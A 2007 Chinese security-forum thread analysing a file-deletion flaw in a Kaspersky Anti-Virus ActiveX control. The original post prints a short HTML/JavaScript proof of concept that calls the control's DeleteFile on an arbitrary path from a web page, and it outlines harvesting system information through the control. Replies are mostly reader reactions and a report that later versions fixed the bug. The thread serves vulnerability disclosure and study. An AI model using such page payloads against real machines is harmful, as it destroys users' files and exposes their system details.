查看: 3697|回复: 12
收起左侧

Kaspersky Anti-Virus 远程删除任意文件漏洞分析及利用代码

[复制链接]
ruoyesou
发表于 2007-5-24 18:37:38 | 显示全部楼层 |阅读模式
首先声明,这个漏洞是朋友zf在调试程序的时候发现的。
下面来说说这个漏洞,最初发现这个漏洞是由一个ActiveX控件引起的:位于Kaspersky Anti-Virus安装目录下的AxKLProd60.dll。这个控件调用了一个函数:DeleteFile(),获取到这个ActiveX控件的classid即可以在网页中利用这个控件执行DeleteFile的操作。至于该控件的classid获取方法很简单,用UltraEdit打开就能找到了。zf告诉我的时候就同时给我了利用代码:
<SCRIPT language=javascript>
function test()
{
bug.DeleteFile("D:\\1.txt");
}
</script>
<object classid="clsid:D9EC22E7-1A86-4F7C-8940-0303AE5D6756" name="bug">
//这是卡巴斯基组件的注册标识
</object>
<script>javascript:test(); //调用测试函数
</script>
    以上代码存为html文件,在D盘根目录下新建一个1.txt,访问一下这个页面,之前新建的1.txt被删除就说明成功了。上面的D:\\1.txt可以改为任意路径。
之后我针对此代码进行了一些测试,发现并不是通用的。bug.DeleteFile("D:\\1.txt");这样的写法对多数版本有效,但某些版本必须写成:bug.DeleteFile("D:\1.txt");。而且此代码在IE7上执行会被拦截。我想看看有没有多一些的可利用函数,zf给了我一张他反编译得到的表:




看起来有搞头,本准备直接试试列表里的函数,结果一个都用不了,我以为我的用法有问题。于是我拿去和同是try2.org的cfx研究研究。
和cfx一起看了才发现kaba里有两个ActiveX控件,AxKLProd60.dll和AxKLSysInfo.dll。用VB导入才知道,原来之前zf给我的表是导出表而不是导入表。这两个ActiveX控件的导入表截图如下:





这一看傻了,看来导出表里只有DeleteFile()比较有“实际”用处,其他都是一些获取信息的属性。从列表中我们可以看到可以获取已安装文件列表、BIOS版本信息、系统版本信息、HotFix列表等等。看来对获取进一步权限都没什么用处了。不过这些信息都是客户端得到的,作为利用者要得到这些信息还得利用网页,比如用GET方式跟参数写入预先准备好的网站数据库,或者以表单形式将列表提交到数据库之类的我就不多说了。试了几个,其中HotFixList没有正确输出。get_HotFixList()获取的不是字符串么?还请高手多多指教。
能力有限,我们研究此漏洞仅仅到此为止。有高手能将此漏洞发扬光大的希望能发出来哈。看来杀毒软件出错也是很可怕的。前几天的Symantec的误报也害了很多机器。所以提醒大家不要过于依赖杀毒软件,毕竟它们也是程序,也是会有漏洞和BUG的。提高自己的安全意识才是最重要的。希望Kaspersky能尽早修复此漏洞。希望各位到try2.org交流(原scccn改组的团队)。

http://www.ttian.net/website/2007/0522/2292.html
hnmzzmt
发表于 2007-5-24 21:35:41 | 显示全部楼层

好深奥啊

第一次
steffee
发表于 2007-5-24 22:47:16 | 显示全部楼层
看不懂。。。。
lby74
发表于 2007-5-24 22:56:41 | 显示全部楼层
太专业了,不懂.
gwg829
头像被屏蔽
发表于 2007-5-24 23:00:37 | 显示全部楼层
前些天不是做调查 好多人闲论坛不够专业么?

现在专业了又闲看不懂了  唉... 

其实卡饭就是一个普通的卡巴迷的交流论坛  整那么专业做什么?

整天叫嚷着不够专业的人 我想问问他         他自己有多专业呢?

交流  理解至上   [:26:]  

[ 本帖最后由 gwg829 于 2007-5-24 23:01 编辑 ]
yahoo121
发表于 2007-5-24 23:09:12 | 显示全部楼层
虽然自己看不懂,但是这样的好帖子应该支持一下!
327935796
头像被屏蔽
发表于 2007-5-24 23:31:34 | 显示全部楼层
虽然自己不是很能看懂,

可是还是很感谢楼主发这样的技术帖子的

对我们都很有提高技术水平的作用,不是吗

再次谢谢分享
melxman
发表于 2007-5-24 23:52:12 | 显示全部楼层
希望这个有人能上报给卡巴
foxhound
发表于 2007-5-24 23:57:07 | 显示全部楼层
LZ你用做分析的是卡巴那个版本呀~~~~?不知道是不是所有版本都有这个通病
ALEXBLAIR
发表于 2007-5-25 01:35:32 | 显示全部楼层
经测试,卡巴KIS 7.0.0119/KIS 6.768 BETA这两个版本不存在这个问题
BUG was fixed!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-27 21:55 , Processed in 0.133912 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表